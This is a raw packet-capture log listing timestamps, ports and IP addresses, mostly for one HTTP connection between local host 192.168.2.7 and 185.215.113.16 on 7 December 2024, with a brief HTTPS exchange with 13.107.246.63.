Dec 7, 2024 13:00:00.775758982 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.776664019 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.776715994 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.776873112 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.776921034 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.777614117 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.777661085 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.777738094 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.777785063 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.778614998 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.778664112 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.778827906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.778875113 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.779678106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.779757023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.779874086 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.779918909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.780757904 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.780807972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.780891895 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.780941010 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.781759024 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.781810999 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.781953096 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.782000065 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.782788038 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.782851934 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.782993078 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.783039093 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.783901930 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.783951998 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.784043074 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.784090042 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.784903049 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.784951925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.785098076 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.785145044 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.785968065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.786015034 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.786138058 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.786185980 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.786999941 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.787046909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.787209988 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.787256956 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.788084984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.788134098 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.788279057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.788326979 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.789172888 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.789220095 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.789419889 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.789465904 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.790163994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.790244102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.790360928 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.790407896 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.791271925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.791331053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.791465998 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.791516066 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.792395115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.792445898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.792479038 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.792524099 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.930130005 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.930269957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.930305958 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.930344105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.930612087 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.930663109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.931030989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.931082964 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.931723118 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.931775093 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.931862116 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.931906939 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.932663918 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.932717085 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.933001995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.933051109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.933227062 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.933275938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.934055090 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.934104919 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.934302092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.934345961 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.935183048 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.935235023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.935365915 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.935415983 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.936158895 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.936209917 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.936368942 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.936414003 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.937191963 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.937233925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.937392950 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.937437057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.938980103 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.939029932 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.939230919 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.939274073 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.939762115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.939804077 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.939886093 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.939929008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.940570116 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.940635920 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.940639973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.940696001 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.941380024 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.941426039 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.941598892 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.941647053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.942472935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.942523003 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.942679882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.942722082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.943547010 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.943598032 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.943710089 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.943753958 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.944541931 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.944577932 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.944739103 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.944782972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.945571899 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.945617914 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.945784092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.945832968 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.946618080 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.946660995 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.946800947 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.946841955 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.947730064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.947773933 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.947854042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.947896004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.947906017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.948704958 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.948753119 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.948920965 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.948964119 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.949815989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.949866056 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.950002909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.950047016 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.950869083 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.951000929 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.951086998 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.951885939 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.951945066 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.952039003 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.952088118 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.952979088 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.953027010 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.953156948 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.953202963 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.953969955 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.954015970 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.954215050 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.954261065 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.954986095 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.955035925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.955281973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.955337048 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.956029892 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.956075907 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.956233978 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.956280947 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.957075119 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.957120895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.957271099 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.957317114 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.958148956 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.958194971 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.958503962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.958551884 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.959172964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.959218979 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.959363937 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.959414959 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.960256100 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.960309029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.960443974 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.960491896 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.961287975 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.961350918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.961472034 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.961517096 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.962455988 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.962507963 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.962850094 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.962893009 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.963409901 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.963454962 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.963583946 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.963624954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.964268923 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:00.964440107 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.964482069 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.964644909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.964687109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.965471983 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.965524912 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.965663910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.965706110 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.966494083 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.966542959 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.966717958 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.966761112 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.967638969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.967691898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.967746973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.967789888 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.968767881 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.968771935 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:00.968785048 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:00.968833923 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.968991041 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.969033957 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.969317913 CET	49830	443	192.168.2.7	13.107.246.63
Dec 7, 2024 13:00:00.969324112 CET	443	49830	13.107.246.63	192.168.2.7
Dec 7, 2024 13:00:00.969765902 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.969810009 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.969965935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.970007896 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.970725060 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.970769882 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.971026897 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.971071959 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.971895933 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.971960068 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.972090960 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.972134113 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.972831964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.972878933 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.972968102 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.973011017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.973980904 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.974026918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.974299908 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.974344969 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.975848913 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.975913048 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.975924969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.975969076 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.976423025 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.976483107 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.976567030 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.976622105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.977138042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.977191925 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.977360964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.977405071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.978049994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.978099108 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.978246927 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.978287935 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.979110956 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.979163885 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.979252100 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.979295969 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.980144978 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.980201006 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.980333090 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.980379105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.981177092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.981226921 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.981430054 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.981477022 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.982469082 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.982542992 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.982672930 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.982719898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.983432055 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.983483076 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.983640909 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.983685970 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.984349966 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.984394073 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:00.984596014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:00.984642029 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.122301102 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.122390985 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.122432947 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.122477055 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.122831106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.122891903 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.123055935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.123096943 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.123364925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.123403072 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.124154091 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.124196053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.124330044 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.124373913 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.125521898 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.125569105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.125861883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.125910997 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.126692057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.126740932 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.126882076 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.126925945 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.127635956 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.127684116 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.127757072 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.127800941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.128635883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.128691912 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.128824949 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.128865004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.129684925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.129726887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.129867077 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.129914999 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.130660057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.130701065 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.130769014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.130808115 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.131464005 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.131506920 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.131578922 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.131618977 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.132780075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.132843971 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.132875919 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.132917881 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.133924007 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.133982897 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.134179115 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.134223938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.135023117 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.135067940 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.135293007 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.135339022 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:01.136070967 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:01.136116028 CET	49829	80	192.168.2.7	185.215.113.16
